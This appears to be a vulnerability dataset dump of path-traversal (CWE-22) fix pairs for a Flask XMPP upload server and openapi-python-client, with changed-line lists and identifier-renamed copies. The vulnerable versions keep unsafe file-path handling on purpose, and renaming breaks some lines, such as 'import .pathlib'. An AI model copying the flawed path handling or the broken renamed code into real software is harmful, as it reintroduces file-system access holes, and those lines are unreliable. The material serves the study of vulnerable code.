for mimetype_glob in app.config.get("NON_ATTACHMENT_MIME_TYPES", []):
if fnmatch.fnmatch(content_type, mimetype_glob):
break
else:
response_headers["Content-Disposition"] = "attachment"
response_headers["X-Content-Type-Options"] = "nosniff"
response_headers["X-Frame-Options"] = "DENY"
response_headers["Content-Security-Policy"] = "default-src 'none'; frame-ancestors 'none'; sandbox"
@app.route("/<path:path>", methods=["HEAD"])
def head_file(path):
try:
data_file, metadata = get_info(path)
stat = data_file.stat()
except (OSError, werkzeug.exceptions.NotFound):
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
response = flask.Response()
response.headers["Content-Length"] = str(stat.st_size)
generate_headers(
response.headers,
metadata["headers"],
)
return response
@app.route("/<path:path>", methods=["GET"])
def get_file(path):
try:
data_file, metadata = get_info(path)
except (OSError, werkzeug.exceptions.NotFound):
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
response = flask.make_response(flask.send_file(
str(data_file),
))
generate_headers(
response.headers,
metadata["headers"],
)
return response
| path_disclosure | {
"code": [
"def sanitized_join(path: str, root: pathlib.Path) -> pathlib.Path:",
" result = (root / path).absolute()",
" if not str(result).startswith(str(root) + \"/\"):",
" raise ValueError(\"resulting path is outside root\")",
" return result",
"def get_paths(base_path: pathlib.Path):",
" data_file = pathlib.Path(str(base_path) + \".data\")",
" metadata_file = pathlib.Path(str(base_path) + \".meta\")",
"def get_info(path: str, root: pathlib.Path) -> typing.Tuple[",
" dest_path = sanitized_join(",
" path,",
" pathlib.Path(app.config[\"DATA_ROOT\"]),",
" )",
" data_file, metadata_file = get_paths(dest_path)",
" dest_path = sanitized_join(",
" path,",
" pathlib.Path(app.config[\"DATA_ROOT\"]),",
" )",
" except ValueError:",
" dest_path.parent.mkdir(parents=True, exist_ok=True, mode=0o770)",
" data_file, metadata_file = get_paths(dest_path)",
" data_file, metadata = get_info(",
" path,",
" pathlib.Path(app.config[\"DATA_ROOT\"])",
" )",
" except (OSError, ValueError):",
" data_file, metadata = get_info(",
" path,",
" pathlib.Path(app.config[\"DATA_ROOT\"])",
" )",
" except (OSError, ValueError):"
],
"line_no": [
42,
43,
44,
45,
46,
49,
50,
51,
61,
64,
65,
66,
67,
69,
107,
108,
109,
110,
111,
137,
138,
192,
193,
194,
195,
198,
217,
218,
219,
220,
221
]
} | {
"code": [
"def get_paths(root: str, sub_path: str) \\",
" -> typing.Tuple[pathlib.Path, pathlib.Path]:",
" base_path = flask.safe_join(root, sub_path)",
" data_file = pathlib.Path(base_path + \".data\")",
"def get_info(path: str) -> typing.Tuple[",
" data_file, metadata_file = get_paths(app.config[\"DATA_ROOT\"], path)",
" data_file.parent.mkdir(parents=True, exist_ok=True, mode=0o770)",
" data_file, metadata = get_info(path)",
" except (OSError, werkzeug.exceptions.NotFound):",
" data_file, metadata = get_info(path)",
" except (OSError, werkzeug.exceptions.NotFound):"
],
"line_no": [
43,
44,
45,
46,
57,
98,
125,
179,
182,
201,
202
]
} |
import contextlib
import errno
import fnmatch
import json
import hashlib
import hmac
import .pathlib
import typing
import flask
VAR_0 = flask.Flask("xmpp-http-upload")
VAR_0.config.from_envvar("XMPP_HTTP_UPLOAD_CONFIG")
VAR_1 = VAR_0
if VAR_0.config['ENABLE_CORS']:
from flask_cors import CORS
CORS(VAR_0)
def FUNC_0(VAR_2: str, VAR_3: pathlib.Path) -> pathlib.Path:
VAR_12 = (VAR_3 / VAR_2).absolute()
if not str(VAR_12).startswith(str(VAR_3) + "/"):
raise ValueError("resulting VAR_2 is outside root")
return VAR_12
def FUNC_1(VAR_4: pathlib.Path):
VAR_13 = pathlib.Path(str(VAR_4) + ".data")
VAR_5 = pathlib.Path(str(VAR_4) + ".meta")
return VAR_13, VAR_5
def FUNC_2(VAR_5):
with VAR_5.open("r") as f:
return json.load(f)
def FUNC_3(VAR_2: str, VAR_3: pathlib.Path) -> typing.Tuple[
pathlib.Path,
dict]:
VAR_14 = FUNC_0(
VAR_2,
pathlib.Path(VAR_0.config["DATA_ROOT"]),
)
VAR_13, VAR_5 = FUNC_1(VAR_14)
return VAR_13, FUNC_2(VAR_5)
@contextlib.contextmanager
def FUNC_4(VAR_6: pathlib.Path):
with VAR_6.open("xb") as f:
try:
yield f
except: # NOQA
VAR_6.unlink()
raise
@VAR_0.route("/")
def FUNC_5():
return flask.Response(
"Welcome to XMPP HTTP Upload. State your business.",
mimetype="text/plain",
)
def FUNC_6(VAR_7, VAR_8, VAR_9):
while VAR_9 > 0:
VAR_23 = VAR_7.read(min(VAR_9, 4096))
if not VAR_23:
break
VAR_8.write(VAR_23)
VAR_9 -= len(VAR_23)
if VAR_9 > 0:
raise EOFError
@VAR_0.route("/<VAR_2:path>", methods=["PUT"])
def FUNC_7(VAR_2):
try:
VAR_14 = FUNC_0(
VAR_2,
pathlib.Path(VAR_0.config["DATA_ROOT"]),
)
except ValueError:
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
VAR_15 = flask.request.args.get("v", "")
VAR_16 = int(flask.request.headers.get("Content-Length", 0))
VAR_17 = "{} {}".format(VAR_2, VAR_16).encode("utf-8")
VAR_18 = VAR_0.config["SECRET_KEY"]
VAR_19 = hmac.new(VAR_18, VAR_17, hashlib.sha256)
VAR_20 = VAR_19.hexdigest()
if not hmac.compare_digest(VAR_20, VAR_15):
return flask.Response(
"Invalid verification key",
403,
mimetype="text/plain",
)
VAR_21 = flask.request.headers.get(
"Content-Type",
"application/octet-stream",
)
VAR_14.parent.mkdir(parents=True, exist_ok=True, mode=0o770)
VAR_13, VAR_5 = FUNC_1(VAR_14)
try:
with FUNC_4(VAR_13) as fout:
FUNC_6(flask.request.stream, fout, VAR_16)
with VAR_5.open("x") as f:
json.dump(
{
"headers": {"Content-Type": VAR_21},
},
f,
)
except EOFError:
return flask.Response(
"Bad Request",
400,
mimetype="text/plain",
)
except OSError as exc:
if exc.errno == errno.EEXIST:
return flask.Response(
"Conflict",
409,
mimetype="text/plain",
)
raise
return flask.Response(
"Created",
201,
mimetype="text/plain",
)
def FUNC_8(VAR_10, VAR_11):
for VAR_18, value in VAR_11.items():
VAR_10[VAR_18] = value
VAR_21 = VAR_11["Content-Type"]
for mimetype_glob in VAR_0.config.get("NON_ATTACHMENT_MIME_TYPES", []):
if fnmatch.fnmatch(VAR_21, mimetype_glob):
break
else:
VAR_10["Content-Disposition"] = "attachment"
VAR_10["X-Content-Type-Options"] = "nosniff"
VAR_10["X-Frame-Options"] = "DENY"
VAR_10["Content-Security-Policy"] = "default-VAR_7 'none'; frame-ancestors 'none'; sandbox"
@VAR_0.route("/<VAR_2:path>", methods=["HEAD"])
def FUNC_9(VAR_2):
try:
VAR_13, VAR_24 = FUNC_3(
VAR_2,
pathlib.Path(VAR_0.config["DATA_ROOT"])
)
VAR_25 = VAR_13.stat()
except (OSError, ValueError):
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
VAR_22 = flask.Response()
VAR_22.headers["Content-Length"] = str(VAR_25.st_size)
FUNC_8(
VAR_22.headers,
VAR_24["headers"],
)
return VAR_22
@VAR_0.route("/<VAR_2:path>", methods=["GET"])
def FUNC_10(VAR_2):
try:
VAR_13, VAR_24 = FUNC_3(
VAR_2,
pathlib.Path(VAR_0.config["DATA_ROOT"])
)
except (OSError, ValueError):
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
VAR_22 = flask.make_response(flask.send_file(
str(VAR_13),
))
FUNC_8(
VAR_22.headers,
VAR_24["headers"],
)
return VAR_22
|
import contextlib
import errno
import fnmatch
import json
import hashlib
import hmac
import .pathlib
import typing
import flask
import werkzeug.exceptions
VAR_0 = flask.Flask("xmpp-http-upload")
VAR_0.config.from_envvar("XMPP_HTTP_UPLOAD_CONFIG")
VAR_1 = VAR_0
if VAR_0.config['ENABLE_CORS']:
from flask_cors import CORS
CORS(VAR_0)
def FUNC_0(VAR_2: str, VAR_3: str) \
-> typing.Tuple[pathlib.Path, pathlib.Path]:
VAR_12 = flask.safe_join(VAR_2, VAR_3)
VAR_13 = pathlib.Path(VAR_12 + ".data")
VAR_4 = pathlib.Path(VAR_12 + ".meta")
return VAR_13, VAR_4
def FUNC_1(VAR_4):
with VAR_4.open("r") as f:
return json.load(f)
def FUNC_2(VAR_5: str) -> typing.Tuple[
pathlib.Path,
dict]:
VAR_13, VAR_4 = FUNC_0(VAR_0.config["DATA_ROOT"], VAR_5)
return VAR_13, FUNC_1(VAR_4)
@contextlib.contextmanager
def FUNC_3(VAR_6: pathlib.Path):
with VAR_6.open("xb") as f:
try:
yield f
except: # NOQA
VAR_6.unlink()
raise
@VAR_0.route("/")
def FUNC_4():
return flask.Response(
"Welcome to XMPP HTTP Upload. State your business.",
mimetype="text/plain",
)
def FUNC_5(VAR_7, VAR_8, VAR_9):
while VAR_9 > 0:
VAR_22 = VAR_7.read(min(VAR_9, 4096))
if not VAR_22:
break
VAR_8.write(VAR_22)
VAR_9 -= len(VAR_22)
if VAR_9 > 0:
raise EOFError
@VAR_0.route("/<VAR_5:path>", methods=["PUT"])
def FUNC_6(VAR_5):
try:
VAR_13, VAR_4 = FUNC_0(VAR_0.config["DATA_ROOT"], VAR_5)
except werkzeug.exceptions.NotFound:
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
VAR_14 = flask.request.args.get("v", "")
VAR_15 = int(flask.request.headers.get("Content-Length", 0))
VAR_16 = "{} {}".format(VAR_5, VAR_15).encode("utf-8")
VAR_17 = VAR_0.config["SECRET_KEY"]
VAR_18 = hmac.new(VAR_17, VAR_16, hashlib.sha256)
VAR_19 = VAR_18.hexdigest()
if not hmac.compare_digest(VAR_19, VAR_14):
return flask.Response(
"Invalid verification key",
403,
mimetype="text/plain",
)
VAR_20 = flask.request.headers.get(
"Content-Type",
"application/octet-stream",
)
VAR_13.parent.mkdir(parents=True, exist_ok=True, mode=0o770)
try:
with FUNC_3(VAR_13) as fout:
FUNC_5(flask.request.stream, fout, VAR_15)
with VAR_4.open("x") as f:
json.dump(
{
"headers": {"Content-Type": VAR_20},
},
f,
)
except EOFError:
return flask.Response(
"Bad Request",
400,
mimetype="text/plain",
)
except OSError as exc:
if exc.errno == errno.EEXIST:
return flask.Response(
"Conflict",
409,
mimetype="text/plain",
)
raise
return flask.Response(
"Created",
201,
mimetype="text/plain",
)
def FUNC_7(VAR_10, VAR_11):
for VAR_17, value in VAR_11.items():
VAR_10[VAR_17] = value
VAR_20 = VAR_11["Content-Type"]
for mimetype_glob in VAR_0.config.get("NON_ATTACHMENT_MIME_TYPES", []):
if fnmatch.fnmatch(VAR_20, mimetype_glob):
break
else:
VAR_10["Content-Disposition"] = "attachment"
VAR_10["X-Content-Type-Options"] = "nosniff"
VAR_10["X-Frame-Options"] = "DENY"
VAR_10["Content-Security-Policy"] = "default-VAR_7 'none'; frame-ancestors 'none'; sandbox"
@VAR_0.route("/<VAR_5:path>", methods=["HEAD"])
def FUNC_8(VAR_5):
try:
VAR_13, VAR_23 = FUNC_2(VAR_5)
VAR_24 = VAR_13.stat()
except (OSError, werkzeug.exceptions.NotFound):
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
VAR_21 = flask.Response()
VAR_21.headers["Content-Length"] = str(VAR_24.st_size)
FUNC_7(
VAR_21.headers,
VAR_23["headers"],
)
return VAR_21
@VAR_0.route("/<VAR_5:path>", methods=["GET"])
def FUNC_9(VAR_5):
try:
VAR_13, VAR_23 = FUNC_2(VAR_5)
except (OSError, werkzeug.exceptions.NotFound):
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
VAR_21 = flask.make_response(flask.send_file(
str(VAR_13),
))
FUNC_7(
VAR_21.headers,
VAR_23["headers"],
)
return VAR_21
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
30,
32,
36,
40,
41,
47,
48,
52,
54,
55,
59,
60,
68,
70,
72,
73,
82,
83,
90,
91,
99,
102,
103,
117,
124,
131,
136,
139,
143,
165,
171,
172,
176,
183,
187,
188,
196,
204,
212,
213,
227,
236
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
30,
33,
37,
41,
42,
48,
50,
51,
55,
56,
61,
63,
64,
73,
74,
81,
82,
90,
93,
94,
105,
112,
119,
124,
126,
130,
152,
158,
159,
163,
170,
174,
175,
180,
188,
196,
197,
208,
217
] |
0CWE-22
| """ Generate modern Python clients from OpenAPI """
from __future__ import annotations
import shutil
import subprocess
import sys
from pathlib import Path
from typing import Any, Dict, Optional, Sequence, Union
import httpcore
import httpx
import yaml
from jinja2 import Environment, PackageLoader
from openapi_python_client import utils
from .parser import GeneratorData, import_string_from_reference
from .parser.errors import GeneratorError
if sys.version_info.minor == 7: # version did not exist in 3.7, need to use a backport
from importlib_metadata import version
else:
from importlib.metadata import version # type: ignore
__version__ = version(__package__)
def _get_project_for_url_or_path(url: Optional[str], path: Optional[Path]) -> Union[Project, GeneratorError]:
data_dict = _get_document(url=url, path=path)
if isinstance(data_dict, GeneratorError):
return data_dict
openapi = GeneratorData.from_dict(data_dict)
if isinstance(openapi, GeneratorError):
return openapi
return Project(openapi=openapi)
def create_new_client(*, url: Optional[str], path: Optional[Path]) -> Sequence[GeneratorError]:
"""
Generate the client library
Returns:
A list containing any errors encountered when generating.
"""
project = _get_project_for_url_or_path(url=url, path=path)
if isinstance(project, GeneratorError):
return [project]
return project.build()
def update_existing_client(*, url: Optional[str], path: Optional[Path]) -> Sequence[GeneratorError]:
"""
Update an existing client library
Returns:
A list containing any errors encountered when generating.
"""
project = _get_project_for_url_or_path(url=url, path=path)
if isinstance(project, GeneratorError):
return [project]
return project.update()
def _get_document(*, url: Optional[str], path: Optional[Path]) -> Union[Dict[str, Any], GeneratorError]:
yaml_bytes: bytes
if url is not None and path is not None:
return GeneratorError(header="Provide URL or Path, not both.")
if url is not None:
try:
response = httpx.get(url)
yaml_bytes = response.content
except (httpx.HTTPError, httpcore.NetworkError):
return GeneratorError(header="Could not get OpenAPI document from provided URL")
elif path is not None:
yaml_bytes = path.read_bytes()
else:
return GeneratorError(header="No URL or Path provided")
try:
return yaml.safe_load(yaml_bytes)
except yaml.YAMLError:
return GeneratorError(header="Invalid YAML from provided source")
class Project:
TEMPLATE_FILTERS = {"snakecase": utils.snake_case, "spinalcase": utils.spinal_case}
project_name_override: Optional[str] = None
package_name_override: Optional[str] = None
def __init__(self, *, openapi: GeneratorData) -> None:
self.openapi: GeneratorData = openapi
self.env: Environment = Environment(loader=PackageLoader(__package__), trim_blocks=True, lstrip_blocks=True)
self.project_name: str = self.project_name_override or f"{openapi.title.replace(' ', '-').lower()}-client"
self.project_dir: Path = Path.cwd() / self.project_name
self.package_name: str = self.package_name_override or self.project_name.replace("-", "_")
self.package_dir: Path = self.project_dir / self.package_name
self.package_description: str = f"A client library for accessing {self.openapi.title}"
self.version: str = openapi.version
self.env.filters.update(self.TEMPLATE_FILTERS)
def build(self) -> Sequence[GeneratorError]:
""" Create the project from templates """
print(f"Generating {self.project_name}")
try:
self.project_dir.mkdir()
except FileExistsError:
return [GeneratorError(detail="Directory already exists. Delete it or use the update command.")]
self._create_package()
self._build_metadata()
self._build_models()
self._build_api()
self._reformat()
return self._get_errors()
def update(self) -> Sequence[GeneratorError]:
""" Update an existing project """
if not self.package_dir.is_dir():
raise FileNotFoundError()
print(f"Updating {self.project_name}")
shutil.rmtree(self.package_dir)
self._create_package()
self._build_models()
self._build_api()
self._reformat()
return self._get_errors()
def _reformat(self) -> None:
subprocess.run(
"isort .", cwd=self.project_dir, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
)
subprocess.run("black .", cwd=self.project_dir, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def _get_errors(self) -> Sequence[GeneratorError]:
errors = []
for collection in self.openapi.endpoint_collections_by_tag.values():
errors.extend(collection.parse_errors)
errors.extend(self.openapi.schemas.errors)
return errors
def _create_package(self) -> None:
self.package_dir.mkdir()
# Package __init__.py
package_init = self.package_dir / "__init__.py"
package_init_template = self.env.get_template("package_init.pyi")
package_init.write_text(package_init_template.render(description=self.package_description))
pytyped = self.package_dir / "py.typed"
pytyped.write_text("# Marker file for PEP 561")
def _build_metadata(self) -> None:
# Create a pyproject.toml file
pyproject_template = self.env.get_template("pyproject.toml")
pyproject_path = self.project_dir / "pyproject.toml"
pyproject_path.write_text(
pyproject_template.render(
project_name=self.project_name,
package_name=self.package_name,
version=self.version,
description=self.package_description,
)
)
# README.md
readme = self.project_dir / "README.md"
readme_template = self.env.get_template("README.md")
readme.write_text(
readme_template.render(
project_name=self.project_name, description=self.package_description, package_name=self.package_name
)
)
# .gitignore
git_ignore_path = self.project_dir / ".gitignore"
git_ignore_template = self.env.get_template(".gitignore")
git_ignore_path.write_text(git_ignore_template.render())
def _build_models(self) -> None:
# Generate models
models_dir = self.package_dir / "models"
models_dir.mkdir()
models_init = models_dir / "__init__.py"
imports = []
types_template = self.env.get_template("types.py")
types_path = models_dir / "types.py"
types_path.write_text(types_template.render())
model_template = self.env.get_template("model.pyi")
for model in self.openapi.schemas.models.values():
module_path = models_dir / f"{model.reference.module_name}.py"
module_path.write_text(model_template.render(model=model))
imports.append(import_string_from_reference(model.reference))
# Generate enums
enum_template = self.env.get_template("enum.pyi")
for enum in self.openapi.enums.values():
module_path = models_dir / f"{enum.reference.module_name}.py"
module_path.write_text(enum_template.render(enum=enum))
imports.append(import_string_from_reference(enum.reference))
models_init_template = self.env.get_template("models_init.pyi")
models_init.write_text(models_init_template.render(imports=imports))
def _build_api(self) -> None:
# Generate Client
client_path = self.package_dir / "client.py"
client_template = self.env.get_template("client.pyi")
client_path.write_text(client_template.render())
# Generate endpoints
api_dir = self.package_dir / "api"
api_dir.mkdir()
api_init = api_dir / "__init__.py"
api_init.write_text('""" Contains synchronous methods for accessing the API """')
async_api_dir = self.package_dir / "async_api"
async_api_dir.mkdir()
async_api_init = async_api_dir / "__init__.py"
async_api_init.write_text('""" Contains async methods for accessing the API """')
api_errors = self.package_dir / "errors.py"
errors_template = self.env.get_template("errors.pyi")
api_errors.write_text(errors_template.render())
endpoint_template = self.env.get_template("endpoint_module.pyi")
async_endpoint_template = self.env.get_template("async_endpoint_module.pyi")
for tag, collection in self.openapi.endpoint_collections_by_tag.items():
module_path = api_dir / f"{tag}.py"
module_path.write_text(endpoint_template.render(collection=collection))
async_module_path = async_api_dir / f"{tag}.py"
async_module_path.write_text(async_endpoint_template.render(collection=collection))
| """ Generate modern Python clients from OpenAPI """
from __future__ import annotations
import shutil
import subprocess
import sys
from pathlib import Path
from typing import Any, Dict, Optional, Sequence, Union
import httpcore
import httpx
import yaml
from jinja2 import Environment, PackageLoader
from openapi_python_client import utils
from .parser import GeneratorData, import_string_from_reference
from .parser.errors import GeneratorError
if sys.version_info.minor == 7: # version did not exist in 3.7, need to use a backport
from importlib_metadata import version
else:
from importlib.metadata import version # type: ignore
__version__ = version(__package__)
def _get_project_for_url_or_path(url: Optional[str], path: Optional[Path]) -> Union[Project, GeneratorError]:
data_dict = _get_document(url=url, path=path)
if isinstance(data_dict, GeneratorError):
return data_dict
openapi = GeneratorData.from_dict(data_dict)
if isinstance(openapi, GeneratorError):
return openapi
return Project(openapi=openapi)
def create_new_client(*, url: Optional[str], path: Optional[Path]) -> Sequence[GeneratorError]:
"""
Generate the client library
Returns:
A list containing any errors encountered when generating.
"""
project = _get_project_for_url_or_path(url=url, path=path)
if isinstance(project, GeneratorError):
return [project]
return project.build()
def update_existing_client(*, url: Optional[str], path: Optional[Path]) -> Sequence[GeneratorError]:
"""
Update an existing client library
Returns:
A list containing any errors encountered when generating.
"""
project = _get_project_for_url_or_path(url=url, path=path)
if isinstance(project, GeneratorError):
return [project]
return project.update()
def _get_document(*, url: Optional[str], path: Optional[Path]) -> Union[Dict[str, Any], GeneratorError]:
yaml_bytes: bytes
if url is not None and path is not None:
return GeneratorError(header="Provide URL or Path, not both.")
if url is not None:
try:
response = httpx.get(url)
yaml_bytes = response.content
except (httpx.HTTPError, httpcore.NetworkError):
return GeneratorError(header="Could not get OpenAPI document from provided URL")
elif path is not None:
yaml_bytes = path.read_bytes()
else:
return GeneratorError(header="No URL or Path provided")
try:
return yaml.safe_load(yaml_bytes)
except yaml.YAMLError:
return GeneratorError(header="Invalid YAML from provided source")
class Project:
TEMPLATE_FILTERS = {"snakecase": utils.snake_case, "kebabcase": utils.kebab_case}
project_name_override: Optional[str] = None
package_name_override: Optional[str] = None
def __init__(self, *, openapi: GeneratorData) -> None:
self.openapi: GeneratorData = openapi
self.env: Environment = Environment(loader=PackageLoader(__package__), trim_blocks=True, lstrip_blocks=True)
self.project_name: str = self.project_name_override or f"{utils.kebab_case(openapi.title).lower()}-client"
self.project_dir: Path = Path.cwd() / self.project_name
self.package_name: str = self.package_name_override or self.project_name.replace("-", "_")
self.package_dir: Path = self.project_dir / self.package_name
self.package_description: str = f"A client library for accessing {self.openapi.title}"
self.version: str = openapi.version
self.env.filters.update(self.TEMPLATE_FILTERS)
def build(self) -> Sequence[GeneratorError]:
""" Create the project from templates """
print(f"Generating {self.project_name}")
try:
self.project_dir.mkdir()
except FileExistsError:
return [GeneratorError(detail="Directory already exists. Delete it or use the update command.")]
self._create_package()
self._build_metadata()
self._build_models()
self._build_api()
self._reformat()
return self._get_errors()
def update(self) -> Sequence[GeneratorError]:
""" Update an existing project """
if not self.package_dir.is_dir():
raise FileNotFoundError()
print(f"Updating {self.project_name}")
shutil.rmtree(self.package_dir)
self._create_package()
self._build_models()
self._build_api()
self._reformat()
return self._get_errors()
def _reformat(self) -> None:
subprocess.run(
"isort .", cwd=self.project_dir, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
)
subprocess.run("black .", cwd=self.project_dir, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def _get_errors(self) -> Sequence[GeneratorError]:
errors = []
for collection in self.openapi.endpoint_collections_by_tag.values():
errors.extend(collection.parse_errors)
errors.extend(self.openapi.schemas.errors)
return errors
def _create_package(self) -> None:
self.package_dir.mkdir()
# Package __init__.py
package_init = self.package_dir / "__init__.py"
package_init_template = self.env.get_template("package_init.pyi")
package_init.write_text(package_init_template.render(description=self.package_description))
pytyped = self.package_dir / "py.typed"
pytyped.write_text("# Marker file for PEP 561")
def _build_metadata(self) -> None:
# Create a pyproject.toml file
pyproject_template = self.env.get_template("pyproject.toml")
pyproject_path = self.project_dir / "pyproject.toml"
pyproject_path.write_text(
pyproject_template.render(
project_name=self.project_name,
package_name=self.package_name,
version=self.version,
description=self.package_description,
)
)
# README.md
readme = self.project_dir / "README.md"
readme_template = self.env.get_template("README.md")
readme.write_text(
readme_template.render(
project_name=self.project_name, description=self.package_description, package_name=self.package_name
)
)
# .gitignore
git_ignore_path = self.project_dir / ".gitignore"
git_ignore_template = self.env.get_template(".gitignore")
git_ignore_path.write_text(git_ignore_template.render())
def _build_models(self) -> None:
# Generate models
models_dir = self.package_dir / "models"
models_dir.mkdir()
models_init = models_dir / "__init__.py"
imports = []
types_template = self.env.get_template("types.py")
types_path = models_dir / "types.py"
types_path.write_text(types_template.render())
model_template = self.env.get_template("model.pyi")
for model in self.openapi.schemas.models.values():
module_path = models_dir / f"{model.reference.module_name}.py"
module_path.write_text(model_template.render(model=model))
imports.append(import_string_from_reference(model.reference))
# Generate enums
enum_template = self.env.get_template("enum.pyi")
for enum in self.openapi.enums.values():
module_path = models_dir / f"{enum.reference.module_name}.py"
module_path.write_text(enum_template.render(enum=enum))
imports.append(import_string_from_reference(enum.reference))
models_init_template = self.env.get_template("models_init.pyi")
models_init.write_text(models_init_template.render(imports=imports))
def _build_api(self) -> None:
# Generate Client
client_path = self.package_dir / "client.py"
client_template = self.env.get_template("client.pyi")
client_path.write_text(client_template.render())
# Generate endpoints
api_dir = self.package_dir / "api"
api_dir.mkdir()
api_init = api_dir / "__init__.py"
api_init.write_text('""" Contains synchronous methods for accessing the API """')
async_api_dir = self.package_dir / "async_api"
async_api_dir.mkdir()
async_api_init = async_api_dir / "__init__.py"
async_api_init.write_text('""" Contains async methods for accessing the API """')
api_errors = self.package_dir / "errors.py"
errors_template = self.env.get_template("errors.pyi")
api_errors.write_text(errors_template.render())
endpoint_template = self.env.get_template("endpoint_module.pyi")
async_endpoint_template = self.env.get_template("async_endpoint_module.pyi")
for tag, collection in self.openapi.endpoint_collections_by_tag.items():
tag = utils.snake_case(tag)
module_path = api_dir / f"{tag}.py"
module_path.write_text(endpoint_template.render(collection=collection))
async_module_path = async_api_dir / f"{tag}.py"
async_module_path.write_text(async_endpoint_template.render(collection=collection))
| path_disclosure | {
"code": [
" TEMPLATE_FILTERS = {\"snakecase\": utils.snake_case, \"spinalcase\": utils.spinal_case}",
" self.project_name: str = self.project_name_override or f\"{openapi.title.replace(' ', '-').lower()}-client\""
],
"line_no": [
86,
94
]
} | {
"code": [
" TEMPLATE_FILTERS = {\"snakecase\": utils.snake_case, \"kebabcase\": utils.kebab_case}",
" self.project_name: str = self.project_name_override or f\"{utils.kebab_case(openapi.title).lower()}-client\"",
" tag = utils.snake_case(tag)"
],
"line_no": [
86,
94,
234
]
} |
from __future__ import annotations
import shutil
import subprocess
import sys
from pathlib import Path
from typing import Any, Dict, Optional, Sequence, Union
import httpcore
import httpx
import yaml
from jinja2 import Environment, PackageLoader
from openapi_python_client import utils
from .parser import GeneratorData, import_string_from_reference
from .parser.errors import GeneratorError
if sys.version_info.minor == 7: # version did not exist in 3.7, need to use a backport
from importlib_metadata import version
else:
from importlib.metadata import version # type: ignore
__version__ = version(__package__)
def FUNC_0(VAR_0: Optional[str], VAR_1: Optional[Path]) -> Union[CLASS_0, GeneratorError]:
VAR_2 = FUNC_3(VAR_0=url, VAR_1=path)
if isinstance(VAR_2, GeneratorError):
return VAR_2
VAR_3 = GeneratorData.from_dict(VAR_2)
if isinstance(VAR_3, GeneratorError):
return VAR_3
return CLASS_0(VAR_3=openapi)
def FUNC_1(*, VAR_0: Optional[str], VAR_1: Optional[Path]) -> Sequence[GeneratorError]:
VAR_4 = FUNC_0(VAR_0=url, VAR_1=path)
if isinstance(VAR_4, GeneratorError):
return [VAR_4]
return VAR_4.build()
def FUNC_2(*, VAR_0: Optional[str], VAR_1: Optional[Path]) -> Sequence[GeneratorError]:
VAR_4 = FUNC_0(VAR_0=url, VAR_1=path)
if isinstance(VAR_4, GeneratorError):
return [VAR_4]
return VAR_4.update()
def FUNC_3(*, VAR_0: Optional[str], VAR_1: Optional[Path]) -> Union[Dict[str, Any], GeneratorError]:
VAR_35: bytes
if VAR_0 is not None and VAR_1 is not None:
return GeneratorError(header="Provide URL or Path, not both.")
if VAR_0 is not None:
try:
VAR_34 = httpx.get(VAR_0)
VAR_35 = VAR_34.content
except (httpx.HTTPError, httpcore.NetworkError):
return GeneratorError(header="Could not get OpenAPI document from provided URL")
elif VAR_1 is not None:
VAR_35 = VAR_1.read_bytes()
else:
return GeneratorError(header="No URL or Path provided")
try:
return yaml.safe_load(VAR_35)
except yaml.YAMLError:
return GeneratorError(header="Invalid YAML from provided source")
class CLASS_0:
VAR_5 = {"snakecase": utils.snake_case, "spinalcase": utils.spinal_case}
project_name_override: Optional[str] = None
package_name_override: Optional[str] = None
def __init__(self, *, VAR_3: GeneratorData) -> None:
self.openapi: GeneratorData = VAR_3
self.env: Environment = Environment(loader=PackageLoader(__package__), trim_blocks=True, lstrip_blocks=True)
self.project_name: str = self.project_name_override or f"{VAR_3.title.replace(' ', '-').lower()}-client"
self.project_dir: Path = Path.cwd() / self.project_name
self.package_name: str = self.package_name_override or self.project_name.replace("-", "_")
self.package_dir: Path = self.project_dir / self.package_name
self.package_description: str = f"A client library for accessing {self.openapi.title}"
self.version: str = VAR_3.version
self.env.filters.update(self.TEMPLATE_FILTERS)
def FUNC_4(self) -> Sequence[GeneratorError]:
print(f"Generating {self.project_name}")
try:
self.project_dir.mkdir()
except FileExistsError:
return [GeneratorError(detail="Directory already exists. Delete it or use the FUNC_5 command.")]
self._create_package()
self._build_metadata()
self._build_models()
self._build_api()
self._reformat()
return self._get_errors()
def FUNC_5(self) -> Sequence[GeneratorError]:
if not self.package_dir.is_dir():
raise FileNotFoundError()
print(f"Updating {self.project_name}")
shutil.rmtree(self.package_dir)
self._create_package()
self._build_models()
self._build_api()
self._reformat()
return self._get_errors()
def FUNC_6(self) -> None:
subprocess.run(
"isort .", cwd=self.project_dir, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
)
subprocess.run("black .", cwd=self.project_dir, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def FUNC_7(self) -> Sequence[GeneratorError]:
VAR_6 = []
for collection in self.openapi.endpoint_collections_by_tag.values():
VAR_6.extend(collection.parse_errors)
VAR_6.extend(self.openapi.schemas.errors)
return VAR_6
def FUNC_8(self) -> None:
self.package_dir.mkdir()
VAR_7 = self.package_dir / "__init__.py"
VAR_8 = self.env.get_template("package_init.pyi")
VAR_7.write_text(VAR_8.render(description=self.package_description))
VAR_9 = self.package_dir / "py.typed"
VAR_9.write_text("# Marker file for PEP 561")
def FUNC_9(self) -> None:
VAR_10 = self.env.get_template("pyproject.toml")
VAR_11 = self.project_dir / "pyproject.toml"
VAR_11.write_text(
VAR_10.render(
project_name=self.project_name,
package_name=self.package_name,
version=self.version,
description=self.package_description,
)
)
VAR_12 = self.project_dir / "README.md"
VAR_13 = self.env.get_template("README.md")
VAR_12.write_text(
VAR_13.render(
project_name=self.project_name, description=self.package_description, package_name=self.package_name
)
)
VAR_14 = self.project_dir / ".gitignore"
VAR_15 = self.env.get_template(".gitignore")
VAR_14.write_text(VAR_15.render())
